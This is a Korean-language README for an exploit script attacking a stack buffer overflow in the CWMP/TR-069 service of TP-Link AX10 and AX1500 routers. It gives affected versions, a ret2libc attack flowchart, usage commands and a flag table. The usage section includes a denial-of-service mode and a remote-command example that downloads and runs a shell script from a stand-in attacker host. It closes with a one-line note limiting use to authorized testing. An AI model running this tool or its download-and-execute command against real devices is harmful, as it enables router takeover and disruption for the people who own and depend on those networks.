
TP-Link AX10/AX1500 CWMP 버퍼 오버플로 RCE
CWMP(TR-069)의 스택 기반 버퍼 오버플로로 인해 원격 코드 실행이 가능합니다.
| 필드 | 값 |
|---|---|
| 제품 | TP-Link AX10, AX1500 |
| 영향받는 버전 | AX10 < 1.2.1, AX1500 < 1.3.11 |
| CVSS | 8.6 (높음) |
| 유형 | 스택 버퍼 오버플로 |
| 벡터 | CWMP/TR-069 (포트 7547) |
| 영향 | 원격 코드 실행 |
flowchart LR
A[Attacker] --> B["Malicious ACS"]
B --> C["SetParameterValues"]
C --> D["Stack Overflow"]
D --> E["Overwrite PC"]
E --> F["ret2libc"]
F --> G["system()"]
G --> H["RCE"]
이 취약점은 cwmp 프로세스가 SetParameterValues SOAP 요청을 처리할 때 발생합니다. 입력 값이 경계 검사 없이 버퍼 크기를 계산하는 데 사용됩니다.
익스플로잇:
python exploit.py <target_ip> --check-only
python exploit.py 192.168.0.1 --dos
python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
없음 (표준 라이브러리 사용)
승인된 보안 테스트에만 사용하십시오.
| 플래그 | 설명 | 기본값 |
|---|
-p, --port | CWMP 포트 | 7547 |
-c, --command | RCE용 명령 | 없음 |
-t, --timeout | 소켓 타임아웃 | 10 |
--dos | DoS 모드 전용 | 꺼짐 |
--check-only | 취약 여부 확인 | 꺼짐 |